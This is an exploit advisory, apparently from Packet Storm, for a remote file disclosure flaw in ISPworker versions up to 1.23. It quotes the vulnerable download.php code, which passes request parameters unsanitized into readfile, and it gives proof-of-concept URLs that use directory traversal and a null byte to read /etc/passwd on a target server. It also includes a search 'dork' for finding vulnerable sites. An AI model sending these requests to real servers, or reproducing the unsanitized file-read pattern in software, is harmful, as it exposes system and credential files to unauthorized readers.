ISPWorker versions 1.23 and below suffer from remote file disclosure vulnerabilities. This was originally discovered by GolD_M in version 1.21 and still exists in 1.23.
507338988a835a24048a34c4bf90ad279a9977233a9f3409aa696d786bf2e355 [ Discovered by cr4wl3r \ cr4wl3r[4t]linuxmail[dot]org ]
########################################################################
#ISPworker <= 1.23 Remote File Disclosure exploit
#Download Script : http://www.ispware.de/_files/ispworker-1.23.tar.gz
#Dork : die("lamers attempt"); :P
########################################################################
#
#Vuln : ./ispworker-1.23/files/ispworker/module/ticket/download.php
#
# <?header('Content-type: '.$_REQUEST[type]);
# header('Content-Disposition: attachment; filename="'.$_REQUEST[filename].'"');
# readfile("./tmp/$ticketid"."_".$_REQUEST[filename]);
# ?>
#
#PoC : http://[target]/[path]/module/ticket/download.php?ticketid=../../../../../../../../../etc/passwd%00
# http://[target]/[path]/module/ticket/download.php?filename=../../../../../../../../../etc/passwd
#
########################################################################
########################################################################
####################[90r0nt4l0 und3r9r0nd c0mmun1ty]####################
########################################################################
########################################################################
[ Gorontalo / 2009 ]
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed